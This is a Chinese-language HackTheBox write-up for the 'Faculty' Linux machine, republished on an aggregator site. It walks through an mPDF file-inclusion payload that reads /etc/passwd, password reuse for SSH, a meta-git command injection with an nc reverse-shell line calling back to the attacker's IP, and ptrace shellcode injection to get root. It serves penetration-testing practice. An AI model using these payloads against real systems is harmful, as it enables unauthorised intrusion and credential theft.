HackTheBox - Medium - Linux - Faculty

这篇具有很好参考价值的文章主要介绍了HackTheBox - Medium - Linux - Faculty。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Faculty

Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此机器上安装的“meta-git”版本容易受到代码注入攻击,可利用该版本将权限升级到用户“developer”。通过利用“CAP_SYS_PTRACE”功能将 shellcode 注入到以“root”身份运行的进程中,可以将权限提升到“root”。


外部信息收集

端口扫描

循例nmap

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

Web枚举

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

gobuster扫目录

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

admin/

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

这里会转pdf

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

download.php,通过html进行url编码后再转base64直接生成pdf

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

尝试打XHR,但没成功

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

从pdf属性看到又是mPDF

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

谷歌能找到一个7.0版本的LFI

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

payload

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

能读到

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

读/etc/nginx/sites-enabled/default

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	root /var/www/html;

	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;

	server_name _;

	rewrite ^ http://faculty.htb;
}

Foothold

绝对路径找不到真正的网站根目录,但可以相对路径读

login.php

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

db_connect.php读到一组凭据

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

密码重用于gbyolo账户,我们能够通过它登录ssh

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

本地横向移动 -> developer

sudo -l

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

在谷歌能够找到一篇meta git会受命令注入漏洞影响的文章

通过poc,能够执行命令创建文件

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

reverse shell payload

'sss||mkfifo /tmp/f1;nc 10.10.14.18 8888 < /tmp/f1 | /bin/bash > /tmp/f1 #'

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

本地权限提升

getcap

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

HackTricks提供了利用方法

msfvenom生成shellcode

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

利用python脚本生成payload

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

gdb

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

get root

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误文章来源地址https://www.toymoban.com/news/detail-813322.html

到了这里,关于HackTheBox - Medium - Linux - Faculty的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [渗透测试学习]Three - HackTheBox

    本靶机考察的是AWS服务 Task1 问题:打开了多少个TCP端口? nmap扫一下 Task2 问题: 网站“联系人”部分提供的电子邮

    2024年02月02日
    浏览(35)
  • hackthebox --interface medium

    nmap -sV -sC -O -p22,80 10.10.11.200 -oN ports   访问80页面,主页面是这样的  再访问一下index.php或者index.html 发现是404错误, 有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露 利用f12查看js源码 搜索http:// 或者/ 或者/upload 这里搜索到的是/api  说明这里是有可能跳

    2024年02月06日
    浏览(37)
  • DVWA 靶场之 Brute Force-Low&Medium(前期配置铺垫与渗透方法及源码分析)

    首先登录 DVWA 靶场 DVWA 默认的用户有5个,用户名及密码如下: 难度等级设置为 low ,我们先从最简单的开始 来到 Brute Force(暴力破解) 我们可以输入用户名和密码 简单测了几个,回显用户名或密码不正确 但是并未对我们输入的内容及次数进行限制,因此直接进行爆破 暴力

    2024年02月19日
    浏览(42)
  • Kali Linux渗透测试技术详解_渗透测试入门

    知识点 1. Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. 基本用法-重新设置root密码 5 安装debian11系统-默认命令行模式登录 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、

    2024年02月13日
    浏览(56)
  • 【Kali Linux高级渗透测试】深入剖析Kali Linux:高级渗透测试技术与实践

    📕作者简介: 热爱跑步的恒川 ,致力于C/C++、Java、Python等多编程语言,热爱跑步,喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列,大家有兴趣的可以看一看 📘相关专栏C语言初阶、C语言进阶系列、恒川等,大家有兴趣的可以看一看 📙Python零基础入门系列,J

    2024年02月10日
    浏览(49)
  • Linux操作系统渗透测试

    Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 1.通过Kali对服务器场景Linux进行操作系统扫描渗透

    2023年04月09日
    浏览(47)
  • 如何使用Kali Linux进行渗透测试?

    1. 渗透测试简介 渗透测试是通过模拟恶意攻击,评估系统、应用或网络的安全性的过程。Kali Linux为渗透测试人员提供了丰富的工具和资源,用于发现漏洞、弱点和安全风险。 2. 使用Kali Linux进行渗透测试的步骤 以下是使用Kali Linux进行渗透测试的基本步骤: 信息收集: 在进

    2024年02月12日
    浏览(47)
  • 渗透测试(8)- Kali Linux 系统概述

        Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。Kali Linux 是一款全功能的安全操作系统,它可以帮助用户完成各种安全任务,包括网络渗透测试、系统攻击、密码破解、恶意软件分析、社会工程学攻击等,同时也可以用于安全研究,帮助

    2024年01月17日
    浏览(41)
  • 【Kali Linux】高级渗透测试实战篇

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(42)
  • 使用 Kali Linux 进行 Web 渗透测试

    在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。 一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的

    2024年01月23日
    浏览(66)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包